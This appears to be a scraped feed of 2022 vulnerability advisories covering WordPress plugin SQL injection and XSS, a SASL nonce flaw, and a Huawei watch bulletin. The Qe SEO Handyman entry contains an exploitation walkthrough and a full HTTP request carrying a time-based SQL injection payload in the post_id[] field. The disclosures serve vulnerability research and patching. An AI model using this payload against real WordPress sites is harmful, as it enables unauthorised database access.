The WP RSS By Publishers WordPress plugin through 0.1 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2022-4358

The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.

CVE-2022-4357

The LetsRecover WordPress plugin through 1.1.0 does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

CVE-2022-4356

CVE-2022-4355

The Qe SEO Handyman WordPress plugin through 1.0 does not properly sanitize and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by high privilege users such as admin

**qe-seo-handyman 1.0 (2/2) WordPress plugin SQL injection****Vulnerability Metadata**

Key

Value

Date of Disclosure

December 08 2022

Affected Software

qe-seo-handyman

Affected Software Type

WordPress plugin

Version

1.0

Weakness

SQL Injection

CWE ID

CWE-89

CVE ID

CVE-2022-4352

CVSS 3.x Base Score

n/a

CVSS 2.0 Base Score

n/a

Reporter

Daniel Krohmer, Kunal Sharma

Reporter Contact

daniel.krohmer@iese.fraunhofer.de

Link to Affected Software

https://wordpress.org/plugins/qe-seo-handyman

Link to Vulnerability DB

https://nvd.nist.gov/vuln/detail/CVE-2022-4352

**Vulnerability Description**

The import_meta action in qe-seo-handyman 1.0 is vulnerable to SQL injection. An authenticated attacker may abuse the CSV file upload functionality to craft a malicious POST request.

**Exploitation Guide**

Login as admin user. This attack requires at least admin privileges.

The plugin requires all-in-one-seo-pack to be activated.

Head to Qe SEO handy-man.

Click on the link at Step 3 to import a CSV file:

Click on Browse... and select a valid CSV file.

A sample CSV file may look like the following:

    post_id,url,post_title,wpseo_title,wpseo_metadesc,type,term_taxonomy_id
    5,http://localhost/?taxonomy=bp-email-type&term=activity-at-message,activity-at-message,test,test,bp-email-type,5
    

Then, click Submit:

After uploading, hit Continue.

Clicking the previous button triggers the vulnerable request. The post_id[] array is the vulnerable parameter:

A request may look like the following:

In the code, the vulnerable $post_id variable is written at line 90 in ./inc/QE-Seo-handyman-import-csv.php.

The final database query is executed at line 128 of the same file.

**Exploit Payload**

**Please note that cookies and nonces need to be changed according to your user settings, otherwise the exploit will not work.**

The SQL injection can be triggered by sending the request below.

    POST /wp-admin/admin-post.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: http://localhost/wp-admin/admin.php?page=qe-seo-handyman&tab=import
    Content-Type: multipart/form-data; boundary=---------------------------8468852133354988763032646215
    Content-Length: 1377
    Origin: http://localhost
    Connection: close
    Cookie: wordpress_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7C9052465964755f7df388ca7ded12dea9ba2a5fbb3515169d1c4e2f2792cafad2; wp_woocommerce_session_86a9106ae65537651a8e456835b316ab=1%7C%7C1666351832%7C%7C1666348232%7C%7Cc2cb50590cfa7e94229c1621767b0523; wp-settings-1=editor%3Dtinymce%26ampamphidetb%3D1%26ampampmfold%3Do%26mfold%3Do; wp-settings-time-1=1666181852; XDEBUG_SESSION=netbeans-xdebug; wordpress_test_cookie=WP%20Cookie%20check; tk_ai=woo%3AxIFtmbzi40NKIXvwVmH3Vwly; woocommerce_items_in_cart=1; woocommerce_cart_hash=0ed611221b3d80f0fa539cbbda99650c; wp_lang=en_US; wordpress_logged_in_86a9106ae65537651a8e456835b316ab=admin%7C1666354651%7C5hcpdLYnfCYlULiNoxvsLbX15Xk3355i128JO4Rpaec%7Cc6b068ebe7c94a69ba9c603924cf21ddd8463427f2fea34e380736f338a7a6d5
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="action"
    
    import_meta
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="nonce"
    
    62bfc7851f
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_title[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_desc[]"
    
    test
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="term_id[]"
    
    5
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="permalink[]"
    
    http://localhost/?taxonomy=bp-email-type&term=activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="taxonomy[]"
    
    bp-email-type
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="wpseo_focuskw[]"
    
    activity-at-message
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="post_id[]"
    
    5 AND (SELECT 3477 FROM (SELECT(SLEEP(5)))DhVP)
    -----------------------------8468852133354988763032646215
    Content-Disposition: form-data; name="submit"
    
    Submit
    -----------------------------8468852133354988763032646215--

CVE-2022-4352: Security Bulletin

CVE-2022-4351

The WordPress Filter Gallery Plugin WordPress plugin before 0.1.6 does not properly escape the filters passed in the ufg_gallery_filters ajax action before outputting them on the page, allowing a high privileged user such as an administrator to inject HTML or javascript to the plugin settings page, even when the unfiltered_html capability is disabled.

CVE-2022-4142

An issue was discovered in Mellium mellium.im/sasl before 0.3.1. When performing SCRAM-based SASL authentication, if the remote end advertises support for channel binding, no random nonce is generated (instead, the nonce is empty). This causes authentication to fail in the best case, but (if paired with a remote end that does not validate the length of the nonce) could lead to insufficient randomness being used during authentication.

******CVE-2022-48195**

Affected components:

*   mellium.im/sasl

Affected versions:

*   v0.3.0

Fixed in:

v0.3.1

Assigned CVE:

CVE-2022-48195

If the remote end of a SCRAM based SASL authentication attempt advertises support for channel binding an empty nonce is used. This results in authentication failing on servers that verify the nonce length, but when paired with a server that does not properly verify the length it could result in insufficient randomness being used during authentication.

No known exploits or exploit chains take advantage of this issue.

CVE-2022-48195: Mellium — CVE-2022-48195

Hello everyone! Great news for my open source Scanvus project! You can now perform vulnerability checks on Linux hosts and docker images not only using the Vulners.com API, but also with the Vulns.io VM API. It’s especially nice that all the code to support the new API was written and contributed by colleagues from Vulns.io. […]

Scanvus now supports Vulners and Vulns.io VM Linux vulnerability detection APIs

Huawei Aslan Children's Watch has an improper input validation vulnerability. Successful exploitation may cause the watch's application service abnormal.

Huawei Aslan Children's Watch has an improper input validation vulnerability. Successful exploitation may cause the watch's application service abnormal. (Vulnerability ID:HWPSIRT-2022-53187)

This vulnerability has been assigned a (CVE) ID: CVE-2022-39012

Affected Product

Affected Version

Resolved Versions

Aslan-AL10

Aslan-AL10-OTA 11.1.0.118(C00M06)-11.1.0.10118(C00M06)

Aslan-AL10 11.1.0.135(C00M08)

Aslan-AL10

Aslan-AL10-OTA 11.1.0.118(C00M06)-11.1.0.10118(C00M06)

Aslan-AL10-OTA 11.1.0.135(C00M08log)-11.1.0.10135(C00M08log)

Aslan-AL10

Aslan-AL10-OTA 11.1.0.118(C00M06)-11.1.0.10118(C00M06)

Aslan-AL10-OTA 11.1.0.135(C00M08log)-11.1.0.10135(C00M08log)

HWPSIRT-2022-53187:  
Successful exploitation may cause the watch's application service abnormal.

Vulnerabilities are scored base on the CVSS v3.1 scoring system. For details please refer to: http://www.first.org/cvss/specification-document.

HWPSIRT-2022-53187:  
Base score:7.5  
Temporary score:7.0  
Environmental Score:NA  
CVSS v3.1 Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:F/RL:O/RC:C

HWPSIRT-2022-53187:  
This vulnerability can be exploited only when the following conditions are present:   
The attacker can send a specially crafted packet to the affected device.

Technical details:  
Huawei Aslan Children's Watch does not properly validate the external input, resulting in an improper input validation vulnerability. An attacker can send a specially crafted packet to exploit this vulnerability. Successful exploitation may cause the watch's application service abnormal.

The product that supports automatic update will receive a system update prompt. You can install the update to fix the vulnerability.

HWPSIRT-2022-53187:  
This vulnerability was discovered by Huawei internal tester.

2022-11-23 V1.0 Initial Release;  

Huawei adheres to protecting the ultimate interests of users with best efforts and the principle of responsible disclosure and deal with product security issues through our response mechanism.

To enjoy Huawei PSIRT services and obtain Huawei product vulnerability information, please visit http://www.huawei.com/en/psirt.

To report a security vulnerability in Huawei products and solutions, please send it to PSIRT@huawei.com. For details, please visit http://www.huawei.com/en/psirt/report-vulnerabilities.

This document is provided on an "AS IS" basis and does not imply any kind of guarantee or warranty, either express or implied, including the warranties of merchantability or fitness for a particular purpose. In no event shall Huawei or any of its directly or indirectly controlled subsidiaries or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. Your use of the document, by whatsoever means, will be totally at your own risk. Huawei is entitled to amend or update this document from time to time.

Tag

#perl